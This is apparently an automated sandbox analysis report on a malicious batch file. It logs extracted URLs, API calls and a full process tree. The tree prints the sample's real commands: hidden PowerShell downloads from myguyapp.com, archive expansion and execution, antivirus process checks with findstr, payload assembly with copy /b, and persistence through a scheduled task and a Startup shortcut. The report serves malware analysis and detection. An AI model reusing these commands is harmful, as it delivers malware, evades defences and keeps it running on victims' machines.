Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 00000019.00000000.1775153431.0000000000555000.00000002.00000001.01000000.00000009.sdmp, CineBlend.scr, 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmp, CineBlend.scr, 00000025.00000002.1934138128.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: msword.exe.14.drString found in binary or memory: http://www.digicert.com/CPS0
Source: msword.exe.14.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: svchost.exe, 00000007.00000003.1397678041.000001AA08683000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000007.00000003.1397678041.000001AA08650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: choice.exe, 0000001A.00000002.1827456335.0000000002C98000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.1783919185.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.1783752868.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1785009950.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1786134258.0000000003250000.00000004.00000020.00020000.00000000.sdmp, 9W9jJCj9EV.batString found in binary or memory: https://myguyapp.com/W2.pdf
Source: tasklist.exe, 00000014.00000002.1771269783.000000000320F000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000003.1770615869.000000000320E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000003.1770485032.0000000003200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/W2.pdf6
Source: msword.exe, 0000000F.00000002.1734104751.00000000023B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=tin
Source: cmd.exe, 0000001E.00000002.1784753157.0000000000C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFI
Source: tasklist.exe, 00000014.00000002.1771028960.00000000031E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/W2.pdfd
Source: msword.exe, 0000000F.00000002.1734013282.0000000002280000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.1732489885.000000000075E000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.1734104751.00000000023B0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1758622177.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1757907965.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000002.1760983280.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000002.1761710944.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000002.1771269783.000000000320F000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000003.1770615869.000000000320E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000003.1770485032.0000000003200000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000002.1771028960.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000002.1771514838.0000000003370000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001A.00000002.1827537331.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001A.00000002.1827456335.0000000002C98000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.1783919185.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.1783752868.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1785009950.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1786134258.0000000003250000.00000004.00000020.00020000.00000000.sdmp, 9W9jJCj9EV.batString found in binary or memory: https://myguyapp.com/msword.zip
Source: tasklist.exe, 00000014.00000002.1771028960.00000000031E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipr
Source: tasklist.exe, 00000014.00000002.1771514838.0000000003370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.))
Source: cmd.exe, 0000001E.00000002.1785009950.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1786134258.0000000003250000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1784753157.0000000000C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGP
Source: choice.exe, 0000001A.00000002.1827456335.0000000002C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zip~
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: msword.exe.14.drString found in binary or memory: https://www.digicert.com/CPS0
Source: Presidential.15.drString found in binary or memory: https://www.globalsign.com/repository/0

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\677826\Prostores.com
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_004050F9
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BBF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,33_2_00BBF7C7
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BBF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,33_2_00BBF55C
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,15_2_004044D1
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BD9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,33_2_00BD9FD2

System Summary

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile dump: msword.exe.14.dr 524295939Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\msword\msword.exeJump to dropped file
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BB4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,33_2_00BB4763
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BA1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,33_2_00BA1B4D
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,15_2_004038AF
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BAF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,33_2_00BAF20D
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\DischargeFlowers
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\StartupDecision
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\GazetteUna
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\PerfumeDiscussions
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\HospitalityCelebrities
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\DrawnScanner
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\PdasSalaries
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_0040737E15_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00406EFE15_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_004079A215_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_004049A815_2_004049A8
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B6801733_2_00B68017
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B4E1F033_2_00B4E1F0
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B5E14433_2_00B5E144
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B622A233_2_00B622A2
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B422AD33_2_00B422AD
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B7A26E33_2_00B7A26E
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B5C62433_2_00B5C624
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BCC8A433_2_00BCC8A4
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B7E87F33_2_00B7E87F
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B76ADE33_2_00B76ADE
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BB2A0533_2_00BB2A05
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BA8BFF33_2_00BA8BFF
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B5CD7A33_2_00B5CD7A
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B6CE1033_2_00B6CE10
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B7715933_2_00B77159
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B4924033_2_00B49240
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BD531133_2_00BD5311
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B496E033_2_00B496E0
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B6170433_2_00B61704
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B61A7633_2_00B61A76
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B67B8B33_2_00B67B8B
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B49B6033_2_00B49B60
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B67DBA33_2_00B67DBA
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B61D2033_2_00B61D20
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B61FE733_2_00B61FE7
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: String function: 004062CF appears 57 times
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: String function: 00B60DA0 appears 46 times
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: String function: 00B5FD52 appears 40 times
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winBAT@62/101@0/3
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BB41FA GetLastError,FormatMessageW,33_2_00BB41FA
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BA2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,33_2_00BA2010
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BA1A0B AdjustTokenPrivileges,CloseHandle,33_2_00BA1A0B
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,15_2_004044D1
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BADD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,33_2_00BADD87
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_004024FB CoCreateInstance,15_2_004024FB
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BB3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,33_2_00BB3A0E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\W2.pdfJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bihvhc0a.ue4.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" "
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: 9W9jJCj9EV.batReversingLabs: Detection: 13%
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1716,i,17469338737042705526,11542992222865520441,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DesusertionPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 677826
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "MechanicalDlModularRuSchedulingVisibilityProposalsClimb" Hearings
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Charged + ..\Syndicate + ..\Controversy + ..\Fig + ..\Phentermine + ..\Peripheral + ..\Lets + ..\Usgs + ..\Viewed + ..\Dealer + ..\Matter N
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\677826\Prostores.com Prostores.com N
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & echo URL="C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DesusertionPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exeJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1716,i,17469338737042705526,11542992222865520441,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
